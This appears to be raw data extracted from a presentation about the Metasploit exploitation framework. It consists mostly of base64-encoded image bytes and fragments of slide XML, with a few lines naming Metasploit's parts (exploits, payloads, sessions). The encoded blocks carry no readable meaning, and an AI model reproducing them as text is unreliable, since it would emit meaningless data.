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196" name="Picture 4" descr="https://encrypted-tbn0.google.com/images?q=tbn:ANd9GcRnuVAS6tyMmY9mV1gwrTlSrDjNIy_nCZHCOmvVOvuHRRLyNHBzS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72200" y="3336588"/>
            <a:ext cx="2400300" cy="306421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95070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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MEtasploit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160337"/>
            <a:ext cx="6016626" cy="3436936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?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Modular Ruby Based Exploitation Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploits, Payloads, Auxiliaries, Sessions, and more….</a:t>
            </a:r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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBhQREBQUEhIVFRIWFRQUFBUUERUUFBYVFhQVGBUUFRQXHCYeFxojGhUUHy8gIycqLCwsFx4xNTAqNSYrLCoBCQoKDgwOGg8PGiwkHyQpLCksLCwsLCwsLCwpLCksLCksLCwsLCksLCwsLCksLCwsLCksLCkpLCwsLCksLCwsLP/AABEIAOEA4QMBIgACEQEDEQH/xAAcAAABBQEBAQAAAAAAAAAAAAAAAwQFBgcCAQj/xABHEAACAQIDBAYHBAkCBAcBAAABAgMAEQQSIQUGMUETIlFhcZEHMlKBobHBFCNy0TNCYoKissLh8BVzNIOS8SREU2OTs9Il/8QAGQEAAwEBAQAAAAAAAAAAAAAAAAIDAQQF/8QAJREAAgICAwACAgIDAAAAAAAAAAECESExAxJBIlEEE5GhQmFx/9oADAMBAAIRAxEAPwDcaKKKACiiigAooooAKK8LW41E4rb4vliXpG7f1R7+f+a1tWY3RLE1H4nb0SaZsx7F1+PD41GPhpJdZnNvYXQfl86XhwiJ6qgd/E+ZraMtg23JX/Rw2Ha5/wC1JMcS3rShe5R+Q+tO6pm7O/7YraE+FkhWMJ0oiY